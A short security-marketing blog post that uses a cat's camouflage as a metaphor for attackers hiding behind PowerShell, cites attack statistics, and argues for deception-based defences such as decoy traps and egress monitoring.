I was musing on the notion of camouflage recently. I’d seen a tortoise shell cat in some undergrowth and was astonished at how well it blended in, despite being a significantly different color than the surrounding territory. In fact, I only actually even SAW the cat because it moved. I had clearly got a little close and startled it, and it was the movement that alerted me.
A recent Carbon Black report that described cyber-attackers increasingly using native tools on compromised operating systems struck me as particularly interesting. We know from Mandiant’s recent M-Report that an attacker can achieve privilege escalation in as little as three days, and go undetected for nearly a year. With such admirable stealth as this, it makes perfect sense that native tools, often unconditionally trusted by the host operating systems (and the staff operating them), are used for attacks.
PowerShell is one such example of a native tool that can be utilized to infiltrate a company. Seen in 38% of attacks, and with an alarming absence of security alerts prior to investigation of such attacks, PowerShell represents excellent camouflage. Attackers who leverage PowerShell are very likely to go undetected because it can load and execute code by actually interacting with the file system, and it is also commonly used for legitimate purposes (e.g. routine administrative tasks by the IT team). Given also that PowerShell is featured in 61% of Command and Control activities, 47% of activities that involved lateral movement and 37% of privilege escalations, it provides attackers the ability to alter business functions for malicious purposes. PowerShell must clearly be taken very seriously by security teams seeking to gain the advantage.
PowerShell is overwhelmingly used for legitimate purposes in production environments, so attempts to reduce the risk by increasing controls are likely to disrupt business-as-usual for overworked IT teams. In this instance, a Deception-based solution is a worthy adjunct to the security arsenal. A Deception solution will be indistinguishable from production IT assets to PowerShell scripted attacks, and will produce high-fidelity alerts when such attacks attempt to move laterally and toward decoy traps.
Integrated egress traffic monitoring in a Deception solution offers the ability to quickly identify Command and Control activities that may be undetected by the other controls. The best Deception solutions will reveal the credentials used by an attacker once they interact with a decoy trap. This allows security teams to quickly identify whether an attacker has achieved privilege escalation, and then mobilize to disable compromised accounts to mitigate the threat of data loss.
As with all good camouflage, PowerShell might well obscure an attacker from view very effectively. However, as soon as they move, they can be caught with a good Deception solution that encourages movement and facilitates capture.